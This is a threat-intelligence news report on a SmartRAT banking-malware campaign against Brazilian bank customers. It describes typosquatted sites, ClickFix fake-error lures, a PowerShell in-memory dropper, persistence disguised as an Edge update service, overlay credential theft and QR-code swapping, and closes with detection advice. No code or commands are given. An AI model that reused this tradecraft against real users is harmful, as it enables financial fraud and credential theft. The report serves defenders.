Do Son 
At a Glance
- Malware Family: SmartRAT (also tracked as Banana RAT)
- Threat Actor: Suspected Brazilian cybercriminal groups
- Targets or Victims: Customers of major Brazilian banks. ThreatLabz observed multiple instances.
- Delivery Vector: AI-generated typosquatting websites using ClickFix lures.
- Key Capabilities: Remote access, screen streaming, QR code interception, and keylogging.
- Source: Zscaler ThreatLabz and Trend Micro.
TL;DR
Attackers deploy an AI-generated SmartRAT ClickFix campaign to steal financial data. They trick victims into running malicious scripts via fake error screens. Administrators must monitor PowerShell activity to stop these breaches.
Delivery
Attackers register typosquatting domains to impersonate popular banking portals. In this case, they impersonated a major Brazilian bank. They used the domain cartaobb[.]com to mimic the official site. Threat actors use website builders to craft these lures quickly. Zscaler ThreatLabz notes, “The rise of AI-powered website builders is enabling cybercriminals to generate fraudulent web pages quickly with high-fidelity visuals and at scale.”
The malicious page includes active anti-inspection measures. A script intercepts keyboard shortcuts to block the developer console. The script repeatedly clears the console if debugging tools are opened. This prevents security researchers from easily analyzing the page source. When a victim visits the site, a fake Cloudflare CAPTCHA appears. Clicking the CAPTCHA triggers the SmartRAT ClickFix campaign. The script copies a malicious command to the user’s clipboard. It then forces the browser into fullscreen mode.
Finally, it displays a fake Blue Screen of Death. This fake system recovery screen urges the victim to paste the command. The victim pastes the code into the Windows Run dialog. Other vendors track similar activity across different regions. Trend Micro documented this malware family as Banana RAT using a different delivery path.
Infection Chain
The attack progresses when the user runs the pasted PowerShell command. This command acts as a stealth dropper. It hides its console window immediately using Windows API calls. Then, it downloads a decoy text file from a remote server. It also fetches a secondary PHP payload containing encrypted scripts. The dropper decodes hardcoded strings to retrieve decryption keys. It executes the decrypted secondary blob directly in memory. This blob is the core SmartRAT executable.
The malware generates a unique identifier using the machine details. The malware then checks its current system privilege level. If it lacks administrative rights, it prompts for elevation. It repeatedly shows User Account Control dialogs until the user approves.
Once elevated, the malware compiles a C# script dynamically. This script installs a Windows service named MicrosoftEdgeUpdateCore. This service runs under the System account. The malware establishes persistence via logon-triggered scheduled tasks. This ensures the payload runs every time the victim logs in. The infection shares tactical similarities with mass compromises like CVE-2026-26980.
Command-and-Control and Data-Exfiltration Behavior
The malware communicates with its server over a secure TCP connection. It encrypts all traffic using an AES-CBC cipher. The malware generates a unique identity token for the infected machine. If the primary domain fails, it falls back to a hardcoded IP address.
Upon connection, the malware enters a continuous monitoring loop. It tracks user inactivity and processes server commands. The threat actor can execute arbitrary PowerShell commands remotely. Furthermore, the malware monitors active window titles for banking keywords. When it detects a targeted bank, it sends an alert.
The attacker can then deploy a fake, bank-branded overlay. This overlay captures the user’s login credentials silently. The malware also features an automatic QR code scanner. It detects QR codes on the screen using a pixel-contrast algorithm. It sends these detected codes to the operator. The operator can swap the legitimate QR code with a fraudulent one. The victim then unknowingly authorizes a malicious transaction.
Defense or Detection Guidance
Security teams must block the known typosquatting domains immediately. The web-based command panel contains authentication flaws. Analysts used these flaws to expose the entire operation. Defenders should monitor endpoints for unusual PowerShell execution patterns. Look for scripts launched from the Run dialog or public folders. Enforce strict application control to prevent unauthorized script execution.
Organizations must train users to recognize fake browser and system errors. Emphasize that legitimate services never ask users to paste terminal commands. Ensure your endpoint detection tools can spot inline C# compilation. Search for suspicious scheduled tasks posing as Edge updates. Monitor for processes writing logs to hidden diagnostic folders. Blocking access to unverified newly registered domains reduces the attack surface. Patch management remains critical against exploits. Attackers often chain social engineering with known software vulnerabilities.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
